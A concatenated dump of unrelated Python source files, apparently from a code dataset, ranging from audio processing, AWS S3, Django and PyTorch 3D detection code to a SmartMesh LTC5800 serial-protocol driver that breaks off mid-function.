notif = pyglet.media.load("voice/warningMasker1.mp3",streaming = False)
def mainkan():
notif.play()
time.sleep(5)
mainkan()
|
992,188 | b4683a60d3ebfd5eb3062bccd666e670e5923cbc | # from a given list of 4 letter words, check using dictionary if changing
# one letter produces a new valid word
import copy
dictionary=set()
for word in open("output_ex1.txt", "r"):
dictionary.add(word[:-1])
endict = [line[:-2] for line in open("english_dictionary.txt", "r") if len(line)==6] # 4 character words in dictionary
newwords = set()
for word in dictionary:
wordmatrix = [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))]
for c in xrange(ord('a'), ord('z')+1):
for i in range(0,4):
wordmatrix[i][i] = chr(c)
newwords.update(set(["".join(w) for w in wordmatrix if "".join(w) in endict]))
dictionary.update(newwords)
with open("output_ex2.txt", "w") as f_out:
for w in sorted(dictionary, key=str):
f_out.write(w + "\n") |
992,189 | d80d77bf0119590c86439c0f2775e0c6d1580f3e | __author__ = 'anthonymcclay'
__project__ = 'botoExamples'
__date__ = '7/27/17'
__revision__ = '$'
__revision_date__ = '$'
import boto3
import argparse
import textwrap
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
This program Creates a new
s3 Bucket.
----------------------
'''),
epilog='''
BigManSoftware Copyright 2017 - BigmanSoftware
Developed by : Tony McClay
Date: 7/24/2017
All Rights reserved''')
parser.add_argument("bucketName", help="The name of the S3 Bucket to create")
parser.add_argument("--location", help="The Location of the S3 Bucket",
default='us-east-2',
)
# parser.add_argument("--acl", help="The Access control List",
# default='private',
# choices=['private','public-read','public-read-write','authenticated-read']
# )
args = parser.parse_args()
print(args)
bucketName = args.bucketName
location = args.location
programName = parser.prog
# acl = args.acl
print("amazon aws Bucket Name : " + bucketName)
import boto3
s3 = boto3.client('s3')
response = s3.create_bucket(Bucket=bucketName,
CreateBucketConfiguration={
'LocationConstraint': location
}
)
print(response['Location'])
print("created")
|
992,190 | 7f5bd8723f736989aa6a3b946d61a0852278a389 | from pydub import AudioSegment
import numpy as np
import math
attenuate_db = 0
accentuate_db = 2
# https://github.com/paarthmadan/bass-boost/blob/0b58e27049a8ad8d171dae7535384981c741fd58/index.py#L11
def boost(sample):
"""
Yields None, so you can update informations.
:param sample:
:return:
"""
assert isinstance(sample, AudioSegment)
# get the raw audio
yield 1
track_raw = sample.get_array_of_samples()
# as list
yield 2
track_raw = list(track_raw)
# c-value
yield 3
est_mean = np.mean(track_raw)
# a-value
yield 4
est_std = 3.0 * np.std(track_raw) / (math.sqrt(2))
yield 5
bass_factor = int(round((est_std - est_mean) * 0.005))
yield 6
filtered = sample.low_pass_filter(bass_factor)
yield 7
combined = (sample - attenuate_db).overlay(filtered + accentuate_db)
yield combined
# end def
def boost_complete(sample):
for x in boost(sample):
if not isinstance(x, str):
return x
# end if
# end for
# end def |
992,191 | 7a8aa12d23825bd5753d687d418e7c3459e0524b | from setuptools import setup
import sys
try:
from setuptools_rust import RustExtension, Binding
except ImportError:
import subprocess
errno = subprocess.call([sys.executable, "-m", "pip", "install", "setuptools-rust"])
if errno:
print("Please install setuptools-rust package")
raise SystemExit(errno)
else:
from setuptools_rust import RustExtension, Binding
setup(
name="rust-python-ctypes",
description='Example project to extend python with rust and ctypes',
install_requires=['setuptools-rust'],
version="0.1.0",
rust_extensions=[RustExtension("rust_python_ctypes.librust_python_ctypes", binding=Binding.NoBinding)],
packages=["rust_python_ctypes"],
zip_safe=False,
)
|
992,192 | d8aeecf1626fbf8dd29c584be063600293f0cfdc | import pytest
@pytest.fixture
def fixture_example():
print("Setup phase")
yield
print("Teardown phase")
def test_one(fixture_example):
print("Inside test") |
992,193 | 3372ee9b416e9f553a6f291fe3c00172b1433edb | import Helpers as hlp
from Javis_algorithms import Merge_sort as mrg
"""
BINARY TREE IMPLEMENTATION + RANDOM TREE GENERATOR
All the tree nodes have leaves, so the final nodes are full of None leaves
"""
class Node:
def __init__(self, data):
self.left = None
self.right = None
self.data = data
def insert(self, data):
if self.data:
if data < self.data:
if self.left is None:
self.left = Node(data)
else:
self.left.insert(data)
elif data > self.data:
if self.right is None:
self.right = Node(data)
else:
self.right.insert(data)
else:
self.data = data
def random_tree_gerator(self, numNodes, lowerBound, upperBound):
random_data = hlp.random_list(numNodes, lowerBound, upperBound)
sorted_data = mrg.merge_sort(random_data)
# Construction of our binary tree
middle = sorted_data[len(sorted_data) // 2]
root = Node(sorted_data.pop(middle))
for element in sorted_data:
root.insert(element)
return root
def print_tree(self):
if self.left:
self.left.print_tree()
print(self.data),
if self.right:
self.right.print_tree()
|
992,194 | c96ad0e72852efc26c1a4d1228c7163f0674559b | """Version 1 of the Frustum PointNet model used to train models for 3D object detection."""
# Partially based on the following works:
# (1) Charles R. Qi (https://github.com/charlesq34/frustum-pointnets)
# The main author of the Frustum PointNet paper. The source code was shared with Apache Licence v2.0.
# (ii) Siming Fan (https://github.com/simon3dv/frustum_pointnets_pytorch)
# Permission granted by the author of the source code in written form.
import os
import sys
sys.path.append(os.getcwd()+"/models")
from torch.nn import init
from torch.nn import init
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from provider import compute_box3d_iou
from model_utils import FrustumPointNetLoss, point_cloud_masking, parse_output_to_tensors
NUM_HEADING_BIN = 4
NUM_SIZE_CLUSTER = 1 # one size cluster per object class
class InstanceSegNet(nn.Module):
def __init__(self, n_classes=1, n_channel=3):
"""
3D Instance Segmentation Network for Frustum PointNet v1.
:param n_classes: number of classes of objects that the net is being trained on
:param n_channel: number of channels for each point (x, y, z) NOTE that reflectance is ignored in this
implementation
"""
super(InstanceSegNet, self).__init__()
self.conv1 = nn.Conv1d(n_channel, 64, 1)
self.conv2 = nn.Conv1d(64, 64, 1)
self.conv3 = nn.Conv1d(64, 64, 1)
self.conv4 = nn.Conv1d(64, 128, 1)
self.conv5 = nn.Conv1d(128, 1024, 1)
self.conv6 = nn.Conv1d(1088 + n_classes, 512, 1) # shape: (1024+64, 512, 1)
self.conv7 = nn.Conv1d(512, 256, 1)
self.conv8 = nn.Conv1d(256, 128, 1)
self.conv9 = nn.Conv1d(128, 128, 1)
self.conv10 = nn.Conv1d(128, 2, 1)
self.dropout = nn.Dropout(p=0.5)
self.bn1 = nn.BatchNorm1d(64)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(64)
self.bn3 = nn.BatchNorm1d(64)
self.bn4 = nn.BatchNorm1d(128)
self.bn5 = nn.BatchNorm1d(1024)
self.bn6 = nn.BatchNorm1d(512)
self.bn7 = nn.BatchNorm1d(256)
self.bn8 = nn.BatchNorm1d(128)
self.bn9 = nn.BatchNorm1d(128)
def forward(self, points, one_hot_vec):
"""
3D Instance Segmentation Network for Frustum PointNet
:param points: [batch_size, 3, n] input points from each frustum point cloud; reflectance is ignored in this
implementation
:param one_hot_vec: one hot vector for the classes being detected (see original implementation)
:return: [batch_size, n, 2] logits for points belonging to the object of interest vs. background
"""
batch_size = points.size()[0]
num_points = points.size()[2]
out = F.relu(self.bn1(self.conv1(points))) # shape:(batch_size, 64, n)
out = F.relu(self.bn2(self.conv2(out))) # shape:(batch_size, 64, n)
point_features = out
out = F.relu(self.bn3(self.conv3(out))) # shape:(batch_size, 64, n)
out = F.relu(self.bn4(self.conv4(out))) # shape:(batch_size, 128, n)
out = F.relu(self.bn5(self.conv5(out))) # shape:(batch_size, 1024, n)
global_feature = torch.max(out, 2, keepdim=True)[0] # shape:()
one_hot_vec = one_hot_vec.view(batch_size, -1, 1) # shape:()
global_feature = torch.cat([global_feature, one_hot_vec], 1) # shape:(batch_size, 1024 + n_classes, 1)
global_feature_repeat = global_feature.view(batch_size, -1, 1).repeat(1, 1, num_points)
concatenated_feature = torch.cat([point_features, global_feature_repeat], 1)
out = F.relu(self.bn6(self.conv6(concatenated_feature))) # shape:(batch_size, 512, n)
out = F.relu(self.bn7(self.conv7(out))) # shape:(batch_size, 256, n)
out = F.relu(self.bn8(self.conv8(out))) # shape:(batch_size, 128, n)
out = F.relu(self.bn9(self.conv9(out))) # shape:(batch_size, 128, n)
out = self.dropout(out)
out = self.conv10(out) # shape:(batch_size, 2, n)
out = out.transpose(2, 1).contiguous()
return out # logits (softmax implemented in the loss calculation stage)
class TNet(nn.Module):
def __init__(self, n_classes=1):
super(TNet, self).__init__()
self.conv1 = nn.Conv1d(3, 128, 1)
self.conv2 = nn.Conv1d(128, 128, 1)
self.conv3 = nn.Conv1d(128, 256, 1)
self.fc1 = nn.Linear(256 + n_classes, 256)
self.fc2 = nn.Linear(256, 128)
self.fc3 = nn.Linear(128, 3)
self.bn1 = nn.BatchNorm1d(128)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(256)
self.bn4 = nn.BatchNorm1d(256)
self.bn5 = nn.BatchNorm1d(128)
def forward(self, points, one_hot_vec):
batch_size = points.size()[0]
out = F.relu(self.bn1(self.conv1(points)))
out = F.relu(self.bn2(self.conv2(out)))
out = F.relu(self.bn3(self.conv3(out)))
out = torch.max(out, 2)[0]
one_hot_vec = one_hot_vec.view(batch_size, -1) # shape: (batch_size, 1)
out = torch.cat([out, one_hot_vec], 1)
out = F.relu(self.bn4(self.fc1(out)))
out = F.relu(self.bn5(self.fc2(out)))
out = self.fc3(out)
return out
class BBoxNet(nn.Module):
def __init__(self, n_classes=1, n_channel=3):
super(BBoxNet, self).__init__()
self.conv1 = nn.Conv1d(n_channel, 128, 1)
self.conv2 = nn.Conv1d(128, 128, 1)
self.conv3 = nn.Conv1d(128, 256, 1)
self.conv4 = nn.Conv1d(256, 512, 1)
self.fc1 = nn.Linear(512 + n_classes, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, 3 + (2 * NUM_HEADING_BIN) + (4 * NUM_SIZE_CLUSTER))
self.bn1 = nn.BatchNorm1d(128)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(256)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(512)
self.bn6 = nn.BatchNorm1d(256)
def forward(self, points, one_hot_vec):
batch_size = points.size()[0]
out = F.relu(self.bn1(self.conv1(points))) # shape: (batch_size, 128, n)
out = F.relu(self.bn2(self.conv2(out))) # shape: (batch_size, 128, n)
out = F.relu(self.bn3(self.conv3(out))) # shape: (batch_size, 256, n)
out = F.relu(self.bn4(self.conv4(out))) # shape: (batch_size, 512, n)
global_feature = torch.max(out, 2, keepdim=False)[0] # shape: (batch_size, 512)
one_hot_vec = one_hot_vec.view(batch_size, -1) # shape: (batch_size, n_classes)
global_feature = torch.cat([global_feature, one_hot_vec], 1) # shape: (batch_size, 512 + n_classes)
out = F.relu(self.bn5(self.fc1(global_feature))) # shape: (batch_size, 512)
out = F.relu(self.bn6(self.fc2(out))) # shape: (batch_size, 256)
out = self.fc3(out) # shape: (batch_size, 3+ 4*NUM_SIZE_CLUSTER + 3*NUM_HEADING_BIN)
return out
class FrustumPointNet(nn.Module):
def __init__(self, n_classes=1, n_channel=3, return_preds=False):
super(FrustumPointNet, self).__init__()
self.n_classes = n_classes
self.n_channel = n_channel
self.return_preds = return_preds
self.instance_seg_net = InstanceSegNet(self.n_classes, self.n_channel)
self.t_net = TNet(self.n_classes)
self.bbox_net = BBoxNet(self.n_classes)
self.FPNLoss = FrustumPointNetLoss()
def forward(self, data_dicts):
img_id = data_dicts.get("id")
point_cloud = data_dicts.get('point_cloud')
point_cloud = point_cloud[:, :self.n_channel, :]
one_hot = data_dicts.get('one_hot')
bs = point_cloud.shape[0]
seg_label = data_dicts.get('seg')
box3d_center_label = data_dicts.get('box3d_center')
size_class_label = data_dicts.get('size_class')
size_residual_label = data_dicts.get('size_residual')
heading_class_label = data_dicts.get('angle_class')
heading_residual_label = data_dicts.get('angle_residual')
# 3D Instance Segmentation PointNet
logits = self.instance_seg_net(point_cloud, one_hot)
# Mask Point Centroid
object_pts_xyz, mask_xyz_mean, mask = \
point_cloud_masking(point_cloud, logits)
# T-Net
object_pts_xyz = object_pts_xyz.cuda()
center_delta = self.t_net(object_pts_xyz,one_hot)
stage1_center = center_delta + mask_xyz_mean
object_pts_xyz_new = object_pts_xyz - \
center_delta.view(center_delta.shape[0],-1,1).repeat(1,1,object_pts_xyz.shape[-1])
# 3D Box Estimation
box_pred = self.bbox_net(object_pts_xyz_new, one_hot)
center_boxnet, \
heading_scores, heading_residual_normalized, heading_residual, \
size_scores, size_residual_normalized, size_residual = \
parse_output_to_tensors(box_pred, logits, mask, stage1_center)
box3d_center = center_boxnet + stage1_center
# Calculate loss values
losses = self.FPNLoss(logits, seg_label, \
box3d_center, box3d_center_label, stage1_center, \
heading_scores, heading_residual_normalized, \
heading_residual, \
heading_class_label, heading_residual_label, \
size_scores, size_residual_normalized, \
size_residual, \
size_class_label, size_residual_label)
for key in losses.keys():
losses[key] = losses[key]/bs
with torch.no_grad():
seg_correct = torch.argmax(logits.detach().cpu(), 2).eq(seg_label.detach().cpu()).numpy()
seg_accuracy = np.sum(seg_correct) / float(point_cloud.shape[-1])
# Calculate the top-view and 3D box IOU for the boxes
iou2ds, iou3ds = compute_box3d_iou( \
box3d_center.detach().cpu().numpy(),
heading_scores.detach().cpu().numpy(),
heading_residual.detach().cpu().numpy(),
size_scores.detach().cpu().numpy(),
size_residual.detach().cpu().numpy(),
box3d_center_label.detach().cpu().numpy(),
heading_class_label.detach().cpu().numpy(),
heading_residual_label.detach().cpu().numpy(),
size_class_label.detach().cpu().numpy(),
size_residual_label.detach().cpu().numpy())
metrics = {
'seg_acc': seg_accuracy,
'iou2d': iou2ds.mean(),
'iou3d': iou3ds.mean(),
'iou3d_0.5': np.sum(iou3ds >= 0.5) / bs,
'iou3d_0.7': np.sum(iou3ds >= 0.7) / bs
}
if self.return_preds:
preds = {
"img_id": img_id,
"box3d_center": box3d_center.detach().cpu().numpy(),
"heading_scores": heading_scores.detach().cpu().numpy(),
"heading_residual": heading_residual.detach().cpu().numpy(),
"size_scores": size_scores.detach().cpu().numpy(),
"size_residual": size_residual.detach().cpu().numpy(),
"box3d_center_label": box3d_center_label.detach().cpu().numpy(),
"heading_class_label": heading_class_label.detach().cpu().numpy(),
"heading_residual_label": heading_residual_label.detach().cpu().numpy(),
"size_class_label": size_class_label.detach().cpu().numpy(),
"size_residual_label": size_residual_label.detach().cpu().numpy()
}
return losses, metrics, preds
else:
return losses, metrics
|
992,195 | 4711ecaea8167651534033c86eda87f8fa0b51cb | # Generated by Django 2.2.7 on 2019-12-02 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('needs', '0010_auto_20191202_1201'),
]
operations = [
migrations.AlterField(
model_name='needs',
name='needsBeginTime',
field=models.DateField(null=True, verbose_name='开工时间'),
),
migrations.AlterField(
model_name='needs',
name='needsEndTime',
field=models.DateField(null=True, verbose_name='截止时间'),
),
migrations.AlterField(
model_name='needs',
name='needsTime',
field=models.DateField(auto_now_add=True, verbose_name='需求创建时间'),
),
]
|
992,196 | 87d302bb672b9459e05e850895de0593f502197a | """cac URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.contrib.auth import views as auth_views
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
from articulateworks import views as articulate_views
urlpatterns = [
path('logout/', auth_views.LogoutView.as_view(template_name='articulateworks/logout.html'), name='logout'),
path('admin/', admin.site.urls),
path('', articulate_views.index, name='index'),
path('proposals/', articulate_views.get_proposals, name='proposals'),
path('applications/', articulate_views.get_applications, name='applications'),
path('contracts/', articulate_views.get_contracts, name='contracts'),
path('addneeds/', articulate_views.add_needs, name='addneeds'),
path('collaborators/', articulate_views.get_applicants, name='collaborators'),
path('partners/', articulate_views.get_applicants, name='partners'),
path('newapplication/', articulate_views.send_application, name='newapplication'),
path('addrole/', articulate_views.add_role, name='addrole'),
path('addtask/', articulate_views.add_role, name='addtask'),
path('addskill/', articulate_views.add_role, name='addskill'),
# path('applicantskills/', articulate_views.get_userskills_available, name='userskills_list'),
path('applicantskills/', articulate_views.ApplicantSkillsListView.as_view(), name='userskills_list'),
path('paypal_openid_login/', articulate_views.paypal_openid_login, name='paypal_openid_login'),
path('paypal_openid_auth/', articulate_views.paypal_openid_auth, name='paypal_openid_auth'),
path('merchant_payment_failure/', articulate_views.merchant_payment_failure, name='merchant_payment_failure'),
path('merchant_payment_success/', articulate_views.merchant_payment_success, name='merchant_payment_success')
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
|
992,197 | 6c6f03c6f8f386bf2b51cbe8595c48d1fe62c447 | from Game import Game, getch
import random
def main():
game = Game()
game.new_game()
moves = ['up', 'left', 'down', 'right']
while(game.get_sum() != 8):
while(game.get_sum() < 8):
game.play_move(random.choice(moves))
while(game.get_sum() > 8):
game.play_move('undo')
if __name__ == "__main__":
main()
|
992,198 | 58bcc7743e533d49b1873cf000bc0a484900d9dc | import HDLC_communication
import struct
import time
import helpers
LTC5800IPR_PROTOCOL_VERSION = 4
RC_OK = 0
RC_INVALID_COMMAND = 1
RC_INVALID_ARGUMENT = 2
RC_END_OF_LIST = 11
RC_NO_RESOURCES = 12
RC_IN_PROGRESS = 13
RC_NACK = 14
RC_WRITE_FAIL = 15
RC_VALIDATION_ERROR = 16
RC_INV_STATE = 17
RC_NOT_FOUND = 18
RC_UNSUPPORTED = 19
MOTE_STATE_LOST = 0
MOTE_STATE_NEGOTIATING = 1
MOTE_STATE_OPERATIONAL = 4
SMIP_MAX_PAYLOAD_TO_MANAGER = 90
class class_Dongle_Communication(HDLC_communication.class_HDLC_Communication):
def __init__(self,
comm_port,
callback_command_resp=None, # response for commands
callback_notif_event=None, # notification.events
callback_notif_log=None, # notification.logs
callback_notif_data=None, # notifications.data - here data from mote should be processed
callback_notif_ipData=None, # notification.ipData - here data from mote using ipv6 should be processed
callback_notif_healthReport=None, # notification.health RawDataSensors
callback_MgrHello=None, # when manager disconnects from us and waiting for ClientHello message (is_active_session -> False)
callback_HelloResponse=None, # when manager connects us and waiting for further messages from us (is_active_session -> True)
callback_serial_comm_open=None, # serial COM port is now open
callback_serial_comm_close=None): # serial COM port is now closed
HDLC_communication.class_HDLC_Communication.__init__(
self=self,
comm_port=comm_port,
callback_process_message=self.__process_message__,
callback_serial_comm_open=self.__on_serial_comm_open__,
callback_serial_comm_close=self.__on_serial_comm_close__
)
self.callback_command_resp = callback_command_resp
self.callback_serial_comm_open = callback_serial_comm_open
self.callback_serial_comm_close = callback_serial_comm_close
self.callback_notif_event = callback_notif_event
self.callback_notif_log = callback_notif_log
self.callback_notif_data = callback_notif_data
self.callback_notif_ipData = callback_notif_ipData
self.callback_notif_healthReport = callback_notif_healthReport
self.callback_MgrHello = callback_MgrHello
self.callback_HelloResponse = callback_HelloResponse
self.in_active_session = False
self.MgrHelloCounter = 0 # up counter to decide when to send clientHello again
self.mgrSeqNo = 0 # manager sequence number as received in HelloResponse packet, and by acknowledged messages that the manager sends us
self.cliSeqNo = 0 # iComox sequence number sent in Hello message, and in iComox request messages
self.seqNumber = 0 # contains the sequence number of the packet that was acknowledged. write_to_manager() checks it when it waits for response for messages that need to get ACK
# manage the mechanism to send messages that requires returned ACK responses, again and again
self.write_attempts = 0
self.latest_time_for_ack_to_arrive = 0
self.msg_requires_ack = bytearray()
def __on_serial_comm_open__(self, comm):
helpers.OUT("LTC5800IPR.__on_serial_comm_open__")
self.in_active_session = False
self.MgrHelloCounter = 0
if callable(self.callback_serial_comm_open):
self.callback_serial_comm_open(self)
self.send_ClientHello()
def __on_serial_comm_close__(self, comm):
helpers.OUT("LTC5800IPR.__on_serial_comm_close__")
self.in_active_session = False
self.MgrHelloCounter = 0
if callable(self.callback_serial_comm_close):
self.callback_serial_comm_close(self)
def __process_message__(self, comm, msg):
# helpers.OUT("LTC5800IPR.__process_message__")
if len(msg) < 4:
return
control, packetType, seqNumber, payloadLen = struct.unpack("BBBB", msg[:4])
if (control & 1) != 0: # iComox received ack packet
# helpers.OUT("LTC5800IPR: ACK packet received")
if (control & 2) != 0: # iComox previously requested ACK
if seqNumber == self.seqNumber:
return # ignore the packet
else:
self.seqNumber = seqNumber # store the new incoming sequence number and process the message
else: # iComox previously did not request ACK
pass
else: # iComox received data packet (probably notification)
if (control & 2) != 0: # manager requires ACK
self.write_to_manager(packetType=packetType, AckPacket=True, serviceTypeAck=True) # send ACK to the received message
else: # manager requires no ACK
pass
# if (control & 1) != 0: # dongle application received ack packet
# # helpers.OUT("LTC5800IPR: ACK packet received")
# if (control & 2) != 0: # dongle application previously requested ACK
# if seqNumber != self.cliSeqNo:
# self.send_ClientHello(cliSeqNo=0xFF)
# return
# else:
# pass
# else: # dongle application previously did not request ACK
# pass
# else: # dongle application received data packet (probably notification)
# if (control & 2) != 0: # manager requires ACK
# self.write_to_manager(packetType=packetType, AckPacket=True, serviceTypeAck=True) # send ACK to the received message
# if seqNumber == self.seqNumber: # if duplicated packet
# return # ignore the packet
# else:
# self.seqNumber = seqNumber # store the new incoming sequence number and process the message
# else: # manager requires no ACK
# pass
payload = msg[4:]
if packetType == 0x14: # notifications which can be events
# helpers.OUT("LTC5800IPR.notification received")
if (payloadLen > 124) or (len(msg) != payloadLen + 4):
return
if len(payload) < 1:
return
notifType = payload[0]
if notifType == 1: # Event notification
if len(payload) < 6:
return
if callable(self.callback_notif_event):
eventId, eventType = struct.unpack_from(">LB", payload[:6], 1)
eventData = payload[6:]
self.callback_notif_event(self, eventId, eventType, eventData)
elif notifType == 2: # Log notification
if len(payload) < 9:
return
if callable(self.callback_notif_log):
macAddress = payload[1:9]
logMsg = payload[9:]
self.callback_notif_log(self, macAddress, logMsg)
elif notifType == 4: # Data payload notification
if len(payload) < 25:
return
if callable(self.callback_notif_data):
timestamp = payload[1:13]
macAddress = payload[13:21]
srcPort, dstPort = struct.unpack_from(">HH", payload[:25], 21)
data = payload[25:]
self.callback_notif_data(self, timestamp, macAddress, srcPort, dstPort, data)
elif notifType == 5: # 6lowpan packet notification
if len(payload) < 21:
return
if callable(self.callback_notif_ipData):
timestamp = payload[1:13]
macAddress = payload[13:21]
data = payload[21:]
self.callback_notif_ipData(self, timestamp, macAddress, data)
elif notifType == 6: # Health report notification
if len(payload) < 9:
return
if callable(self.callback_notif_healthReport):
macAddress = payload[1:9]
data = payload[9:]
self.callback_notif_healthReport(self, macAddress, data)
else:
return
elif packetType == 2: # Hello response
helpers.OUT("LTC5800IPR.HelloResponse")
if len(payload) < 5:
return
RC, version, self.mgrSeqNo, self.cliSeqNo, mode = struct.unpack("BBBBB", payload[:5])
if RC == 0:
self.in_active_session = True
self.MgrHelloCounter = 0
if callable(self.callback_HelloResponse):
self.callback_HelloResponse(self, RC, version, mode)
else:
self.send_ClientHello(self)
elif packetType == 3: # MgrHello
helpers.OUT("LTC5800IPR.MgrHello")
self.in_active_session = False
self.MgrHelloCounter += 1
if callable(self.callback_MgrHello):
self.callback_MgrHello(self, self.MgrHelloCounter)
# self.send_ClientHello()
else:
if (len(payload) == 0) or (payloadLen > 124) or (len(msg) != payloadLen + 4): # The RC field is not included in the payloadLen????
helpers.OUT("__process_message__(): Illegal payload field, or payload does not contain RC field")
return # illegal payloadLen field, or payload does not contain the RC field
if callable(self.callback_command_resp):
RC = payload[0]
if len(payload) < 2:
data = bytearray()
else:
data = payload[1:]
self.callback_command_resp(self, packetType, RC, data)
def write_service_type_ack_msg_to_manager(self):
if self.write_attempts > 0:
self.write_attempts -= 1
self.latest_time_for_ack_to_arrive = time.monotonic() + 0.2 # 200 msec before trying again
result = self.write_hdlc_msg(msg=self.msg_requires_ack)
if not result:
self.write_attempts = 0
self.close()
else:
self.send_ClientHello(cliSeqNo=0)
result = False
return result
def write_to_manager(self, packetType, payload=bytearray(), AckPacket=False, serviceTypeAck=True):
Control = 0
if AckPacket:
Control |= 1
if serviceTypeAck:
Control |= 2
if serviceTypeAck:
if AckPacket:
seqNo = self.mgrSeqNo
else:
self.cliSeqNo = (self.cliSeqNo + 1) % 256
seqNo = self.cliSeqNo
else:
seqNo = 0
msg = bytearray([Control, packetType, seqNo, len(payload)]) + payload
if serviceTypeAck:
self.msg_requires_ack = msg
self.write_attempts = 1
return self.write_service_type_ack_msg_to_manager()
else:
return self.write_hdlc_msg(msg=msg)
def send_ClientHello(self, cliSeqNo=None):
helpers.OUT("ClientHello")
if cliSeqNo is not None:
self.cliSeqNo = cliSeqNo
payload = bytearray(struct.pack("BBB", LTC5800IPR_PROTOCOL_VERSION, self.cliSeqNo, 0))
return self.write_to_manager(packetType=0x01, payload=payload, serviceTypeAck=False)
def send_resetSystem(self, serviceTypeAck=True):
helpers.OUT("resetSystem")
return self.write_to_manager(packetType=0x15, payload=bytearray(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00"), serviceTypeAck=serviceTypeAck)
def send_resetMote(self, macAddress, serviceTypeAck=True):
helpers.OUT("resetMote")
payload = bytearray(b"\x02") + macAddress
return self.write_to_manager(packetType=0x15, payload=payload, serviceTypeAck=serviceTypeAck)
def send_subscribe(self, filter, unackFilter, serviceTypeAck=True):
helpers.OUT("subscribe")
payload = bytearray(struct.pack(">LL", filter, unackFilter))
return self.write_to_manager(packetType=0x16, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getTime(self, serviceTypeAck=True):
helpers.OUT("getTime")
return self.write_to_manager(packetType=0x17, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setNetworkConfig(self, networkID, apTxPower, frameProfile, maxMotes, baseBandwidth, downFrameMultVal, numParents, ccaMode, channelList, bbMode, bbSize, isRadioTest, bwMult, oneChannel, serviceTypeAck=False):
helpers.OUT("setNetworkConfig")
payload = bytearray(struct.pack(">HbBHHBBBHBBBHB", networkID, apTxPower, frameProfile, maxMotes, baseBandwidth, downFrameMultVal, numParents, ccaMode, channelList, bbMode, bbSize, isRadioTest, bwMult, oneChannel))
return self.write_to_manager(packetType=0x1A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_clearStatistics(self, serviceTypeAck=True):
helpers.OUT("clearStatistics")
return self.write_to_manager(packetType=0x1F, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_exchangeMoteJoinKey(self, macAddress, key, serviceTypeAck=True):
helpers.OUT("exchangeMoteJoinKey")
payload = macAddress + key
return self.write_to_manager(packetType=0x21, payload=payload, serviceTypeAck=serviceTypeAck)
def send_exchangeNetworkId(self, id, serviceTypeAck=True):
helpers.OUT("exchangeNetworkId")
return self.write_to_manager(packetType=0x22, payload=bytearray([id]), serviceTypeAck=serviceTypeAck)
def send_radiotestTx(self, testType, chanMask, repeatCnt, txPower, seqSize, sequenceDef, stationId, serviceTypeAck=True):
helpers.OUT("radiotestTx")
assert(len(sequenceDef) <= 10)
payload = bytearray(struct.pack(">BHHbB", testType, chanMask, repeatCnt, txPower, seqSize))
for seqDef in sequenceDef:
payload += bytearray(struct.pack(">BH", seqDef.pkLen, seqDef.delay))
payload += bytearray([stationId])
return self.write_to_manager(packetType=0x23, payload=payload, serviceTypeAck=serviceTypeAck)
def send_radiotestRx(self, mask, duration, stationId, serviceTypeAck=True):
helpers.OUT("radiotestRx")
payload = bytearray(struct.pack(">HHB", mask, duration, stationId))
return self.write_to_manager(packetType=0x25, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getRadiotestStatistics(self, serviceTypeAck=True):
helpers.OUT("getRadiotestStatistics")
return self.write_to_manager(packetType=0x26, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setACLEntry(self, macAddress, joinKey, serviceTypeAck=True):
helpers.OUT("setACLEntry")
payload = bytearray(macAddress) + bytearray(joinKey)
return self.write_to_manager(packetType=0x27, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getNextACLEntry(self, macAddress, serviceTypeAck=True):
helpers.OUT("getNextACLEntry")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x28, payload=payload, serviceTypeAck=serviceTypeAck)
def send_deleteACLEntry(self, macAddress, serviceTypeAck=True):
helpers.OUT("deleteACLEntry")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x29, payload=payload, serviceTypeAck=serviceTypeAck)
def send_pingMote(self, macAddress, serviceTypeAck=True):
helpers.OUT("pingMote")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x2A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getLog(self, macAddress, serviceTypeAck=True):
helpers.OUT("getLog")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x2B, payload=payload, serviceTypeAck=serviceTypeAck)
def send_sendData(self, macAddress, priority, srcPort, dstPort, data, serviceTypeAck=True):
helpers.OUT("sendData")
payload = bytearray(macAddress) + bytearray(struct.pack(">BHHB", priority, srcPort, dstPort, 0)) + bytearray(data)
return self.write_to_manager(packetType=0x2C, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getSystemInfo(self, serviceTypeAck=True):
helpers.OUT("getSystemInfo")
return self.write_to_manager(packetType=0x2E, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getMoteConfig(self, macAddress, next, serviceTypeAck=True):
helpers.OUT("Send getMoteConfig() to {}".format(helpers.u8s_to_str(macAddress, ":", "")))
